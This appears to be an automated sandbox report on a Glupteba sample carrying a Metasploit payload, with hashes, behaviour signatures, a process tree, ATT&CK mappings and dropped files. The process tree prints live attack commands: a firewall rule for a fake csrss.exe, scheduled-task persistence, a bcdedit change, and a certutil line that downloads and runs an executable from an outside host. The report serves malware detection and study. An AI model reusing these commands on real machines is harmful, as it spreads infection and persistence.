Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220414-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-07-2022 14:40

General

  • Target

    5186b312cb24ae2294667e934975472ae5ef971d23c8290455273fbb1a263f52.exe

  • Size

    3.8MB

  • MD5

    16b3bac20c0e5bcbfbe25b27943ea01f

  • SHA1

    84c62588bb877af56d7b2376c8f3e22834d414a1

  • SHA256

    5186b312cb24ae2294667e934975472ae5ef971d23c8290455273fbb1a263f52

  • SHA512

    280f2d8fbdb854a17fa2381826d0a0a12f38aa1d46959e96e05081dfac13be002df14ca3869acb4f508d7f24f68de59d4da1db0220b90c4aba2bf4db6aedb030

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 7 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5186b312cb24ae2294667e934975472ae5ef971d23c8290455273fbb1a263f52.exe
    "C:\Users\Admin\AppData\Local\Temp\5186b312cb24ae2294667e934975472ae5ef971d23c8290455273fbb1a263f52.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1608
    • C:\Users\Admin\AppData\Local\Temp\5186b312cb24ae2294667e934975472ae5ef971d23c8290455273fbb1a263f52.exe
      "C:\Users\Admin\AppData\Local\Temp\5186b312cb24ae2294667e934975472ae5ef971d23c8290455273fbb1a263f52.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:964
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4892
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:1172
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4352
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:4604
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:1636
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1976
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3832

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    16b3bac20c0e5bcbfbe25b27943ea01f

    SHA1

    84c62588bb877af56d7b2376c8f3e22834d414a1

    SHA256

    5186b312cb24ae2294667e934975472ae5ef971d23c8290455273fbb1a263f52

    SHA512

    280f2d8fbdb854a17fa2381826d0a0a12f38aa1d46959e96e05081dfac13be002df14ca3869acb4f508d7f24f68de59d4da1db0220b90c4aba2bf4db6aedb030

  • C:\Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    16b3bac20c0e5bcbfbe25b27943ea01f

    SHA1

    84c62588bb877af56d7b2376c8f3e22834d414a1

    SHA256

    5186b312cb24ae2294667e934975472ae5ef971d23c8290455273fbb1a263f52

    SHA512

    280f2d8fbdb854a17fa2381826d0a0a12f38aa1d46959e96e05081dfac13be002df14ca3869acb4f508d7f24f68de59d4da1db0220b90c4aba2bf4db6aedb030

  • memory/964-135-0x0000000004248000-0x00000000045F0000-memory.dmp
    Filesize

    3.7MB

  • memory/964-133-0x0000000000000000-mapping.dmp
  • memory/964-142-0x0000000000400000-0x00000000025C0000-memory.dmp
    Filesize

    33.8MB

  • memory/964-136-0x0000000000400000-0x00000000025C0000-memory.dmp
    Filesize

    33.8MB

  • memory/1172-138-0x0000000000000000-mapping.dmp
  • memory/1608-131-0x00000000047B0000-0x0000000004FB4000-memory.dmp
    Filesize

    8.0MB

  • memory/1608-132-0x0000000000400000-0x00000000025C0000-memory.dmp
    Filesize

    33.8MB

  • memory/1608-130-0x0000000004405000-0x00000000047AD000-memory.dmp
    Filesize

    3.7MB

  • memory/1608-134-0x0000000000400000-0x00000000025C0000-memory.dmp
    Filesize

    33.8MB

  • memory/1636-147-0x0000000000000000-mapping.dmp
  • memory/1976-149-0x0000000000000000-mapping.dmp
  • memory/2812-139-0x0000000000000000-mapping.dmp
  • memory/2812-143-0x0000000004600000-0x00000000049A8000-memory.dmp
    Filesize

    3.7MB

  • memory/2812-144-0x0000000000400000-0x00000000025C0000-memory.dmp
    Filesize

    33.8MB

  • memory/2812-150-0x0000000000400000-0x00000000025C0000-memory.dmp
    Filesize

    33.8MB

  • memory/4352-145-0x0000000000000000-mapping.dmp
  • memory/4604-146-0x0000000000000000-mapping.dmp
  • memory/4892-137-0x0000000000000000-mapping.dmp